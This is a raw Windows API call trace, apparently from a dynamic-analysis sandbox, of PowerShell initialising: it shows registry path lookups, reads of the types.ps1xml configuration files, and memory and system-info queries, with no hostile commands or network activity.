	[0405.461] RegQueryValueExW (in: hKey=0x1c8, lpValueName="path", lpReserved=0x0, lpType=0x20d52c, lpData=0x3459d0, lpcbData=0x20d528*=0x74 | out: lpType=0x20d52c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x20d528*=0x74) returned 0x0
	[0405.461] CoTaskMemFree (pv=0x3459d0) 
	[0405.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x20d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0405.461] SetErrorMode (uMode=0x1) returned 0x1
	[0405.461] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x20d4b0 | out: lpFileInformation=0x20d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0405.461] SetErrorMode (uMode=0x1) returned 0x1
	[0405.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0405.464] SetErrorMode (uMode=0x1) returned 0x1
	[0405.464] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d4b0 | out: lpFileInformation=0x20d4b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0405.464] SetErrorMode (uMode=0x1) returned 0x1
	[0405.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0405.468] SetErrorMode (uMode=0x1) returned 0x1
	[0405.468] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d4b0 | out: lpFileInformation=0x20d4b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0405.468] SetErrorMode (uMode=0x1) returned 0x1
	[0405.472] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0405.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.472] CoTaskMemFree (pv=0x1b91c600) 
	[0405.855] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0405.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.856] CoTaskMemFree (pv=0x1b91c600) 
	[0405.857] GetACP () returned 0x4e4
	[0405.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0405.866] SetErrorMode (uMode=0x1) returned 0x1
	[0405.867] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0405.868] GetFileType (hFile=0x1c4) returned 0x1
	[0405.868] SetErrorMode (uMode=0x1) returned 0x1
	[0405.869] GetFileType (hFile=0x1c4) returned 0x1
	[0405.872] ReadFile (in: hFile=0x1c4, lpBuffer=0x2f6f460, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2f6f460*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0405.876] ReadFile (in: hFile=0x1c4, lpBuffer=0x2f6f460, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2f6f460*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0405.876] ReadFile (in: hFile=0x1c4, lpBuffer=0x2f6f460, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2f6f460*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0405.877] ReadFile (in: hFile=0x1c4, lpBuffer=0x2f6f460, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2f6f460*, lpNumberOfBytesRead=0x20d3e8*=0xcf3, lpOverlapped=0x0) returned 1
	[0405.877] ReadFile (in: hFile=0x1c4, lpBuffer=0x2f6e8bb, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2f6e8bb*, lpNumberOfBytesRead=0x20d3e8*=0x0, lpOverlapped=0x0) returned 1
	[0405.877] ReadFile (in: hFile=0x1c4, lpBuffer=0x2f6f460, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2f6f460*, lpNumberOfBytesRead=0x20d3e8*=0x0, lpOverlapped=0x0) returned 1
	[0405.879] CloseHandle (hObject=0x1c4) returned 1
	[0405.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0405.883] SetErrorMode (uMode=0x1) returned 0x1
	[0405.883] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d360 | out: lpFileInformation=0x20d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0405.883] SetErrorMode (uMode=0x1) returned 0x1
	[0405.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0405.884] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x1c4) returned 0x0
	[0405.884] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d3cc, lpData=0x0, lpcbData=0x20d3c8*=0x0 | out: lpType=0x20d3cc*=0x1, lpData=0x0, lpcbData=0x20d3c8*=0x56) returned 0x0
	[0405.885] CoTaskMemAlloc (cb=0x5a) returned 0x1b919910
	[0405.885] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d39c, lpData=0x1b919910, lpcbData=0x20d398*=0x56 | out: lpType=0x20d39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d398*=0x56) returned 0x0
	[0405.885] CoTaskMemFree (pv=0x1b919910) 
	[0405.885] RegCloseKey (hKey=0x1c4) returned 0x0
	[0405.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0405.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0406.320] GetSystemInfo (in: lpSystemInfo=0x20c080 | out: lpSystemInfo=0x20c080*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0406.320] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0406.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0406.697] SetErrorMode (uMode=0x1) returned 0x1
	[0406.697] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0406.697] GetFileType (hFile=0x1c8) returned 0x1
	[0406.697] SetErrorMode (uMode=0x1) returned 0x1
	[0406.697] GetFileType (hFile=0x1c8) returned 0x1
	[0406.697] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.698] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.698] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.699] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.699] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.699] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.699] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.699] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.700] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.700] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.701] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.701] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.701] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.702] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.702] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.702] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.702] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.704] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.704] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.704] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.704] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.705] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.705] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.705] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.705] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.705] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.706] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.706] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.706] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.707] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.707] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.707] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.707] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.709] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.710] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.710] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.710] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.710] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.711] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.711] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.711] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.711] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x1b4, lpOverlapped=0x0) returned 1
	[0406.711] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e69680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3e8, lpOverlapped=0x0 | out: lpBuffer=0x2e69680*, lpNumberOfBytesRead=0x20d3e8*=0x0, lpOverlapped=0x0) returned 1
	[0406.712] CloseHandle (hObject=0x1c8) returned 1
	[0406.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0406.712] SetErrorMode (uMode=0x1) returned 0x1
	[0406.712] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d360 | out: lpFileInformation=0x20d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0406.712] SetErrorMode (uMode=0x1) returned 0x1
	[0406.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0406.712] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x1c8) returned 0x0
	[0406.712] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d3cc, lpData=0x0, lpcbData=0x20d3c8*=0x0 | out: lpType=0x20d3cc*=0x1, lpData=0x0, lpcbData=0x20d3c8*=0x56) returned 0x0
	[0406.712] CoTaskMemAlloc (cb=0x5a) returned 0x1b919ad0
	[0406.712] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d39c, lpData=0x1b919ad0, lpcbData=0x20d398*=0x56 | out: lpType=0x20d39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d398*=0x56) returned 0x0
	[0406.713] CoTaskMemFree (pv=0x1b919ad0) 
	[0406.713] RegCloseKey (hKey=0x1c8) returned 0x0
	[0406.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0406.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0407.539] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.548] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.549] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
